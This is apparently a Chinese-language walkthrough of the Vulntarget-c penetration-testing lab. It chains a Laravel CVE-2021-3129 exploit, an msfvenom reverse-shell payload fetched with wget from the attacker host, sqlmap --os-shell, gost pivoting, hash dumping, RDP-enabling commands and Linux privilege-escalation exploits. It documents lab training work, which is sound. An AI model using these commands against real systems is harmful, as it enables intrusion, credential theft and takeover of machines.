Vulntarget-c WriteUp

外网打点

http://192.168.255.133/

nmap扫描之后发现22端口和80端口,尝试对22端口进行爆破失败,于是考虑对80端口渗透。

打开看到是laravel,开启xray扫一下,扫到了CVE-2021-3129,尝试利用

image-20220404172801341

https://github.com/ambionics/phpggc

https://github.com/SNCKER/CVE-2021-3129

目录结构如下

image-20220404174230224

修改main里面代码获得一个shell

image-20220404174209350

上线msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.255.132 LPORT=4444 -f elf -o 1.elf

kali:python3 -m http.server 80

受害机:wget http://192.168.255.132/1.elf -O /tmp/1.elf

chmod u+x /tmp/1.elf

/tmp/1.elf

msf: run post/multi/manage/autoroute

image-20220404175228121

信息搜集

上传fscan、看arp收集内网主机信息,查看arp表发现10.0.20.100主机,开个socks代理上去,可以看到10.0.20.100跑了web服务,先放这里不管了。

提权

当前是www-data用户,权限较低,尝试使用exploit suggester等方法失败后,发现home目录下存在vulntarget用户,弱口令root上去,sudo -l,可以看到当前用户是有root权限的

直接以当前用户sudo elf文件:

image-20220404181415810

sudo passwd root 直接改掉root密码即可获取root权限

内网主机1

http://10.0.20.100/

image-20220404181538594

Windows php8

http://10.0.20.100/admin/

admin admin123弱口令上去,首先找上传,模板修改点,没找到。

搜到了一个sql注入,但是msf的代理不太稳定,传一个gost开socks代理

受害跳板:gost -L=:5001/192.168.255.132:5000

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
GET /admin/inquiries/view_details.php?id=1 HTTP/1.1
Host: 10.0.20.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.0.20.100/admin/?page=inquiries
Cookie: PHPSESSID=ndd4l701jdk2un19ijjhufgc39GET /admin/inquiries/view_details.php?id=1 HTTP/1.1
Host: 10.0.20.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.0.20.100/admin/?page=inquiries
Cookie: PHPSESSID=ndd4l701jdk2un19ijjhufgc39

python3 sqlmap.py -u “http://10.0.20.100/admin/inquiries/view_details.php?id=1" –os-shell

查看权限,是system权限,还不错。

上线msf

利用sqlmap的文件上传尝试传马,但是失败了,看下是不是有杀软

image-20220404215620615

有defender,尝试免杀下

免杀过后一直无法上线,考虑是防火墙问题,修改一下,使用gost端口转发上线:

跳板机1监听5001,受害机2连接跳板机1的5001,跳板机1的5001转发至kali的5000,kali msf监听5000

image-20220404225434564

image-20220404225447933

信息搜集

net time /domain 和net user /domain 判断后机器不在域环境

image-20220404225852426

添加路由,发现10.0.10.0/24网段,扫一下

发现主机10.0.10.110存活,开放了22端口

凭证收集

image-20220404225547746

kiwi模块dump hash,解密得管理员密码Admin#123

开3389

1
2
3
4
5
reg add "HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
最后一句话解决mstsc报错问题

上去之后发现有个mobaxterm,猜一下密码就是登陆密码,上去了

内网主机2

发现mobaXterm的主机ip地址和刚才扫到的一致,双击直接登陆进去了,传一下linux_exploit_suggester试试

1
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc

提权

https://github.com/briskets/CVE-2021-3493

kali编译一下然后传过去,直接提到root权限。

image-20220404233528904

上线msf

内网主机2 反向连接内网主机1的5005端口,内网主机1监听5005转发到外网主机5006,外网主机监听5006转发到5007,msf监听5007.

msfvenom生成的木马host写内网主机1的同网卡ip,port写5005.

image-20220404235226170

image-20220404235208042

image-20220404235257440

最后成功上线msf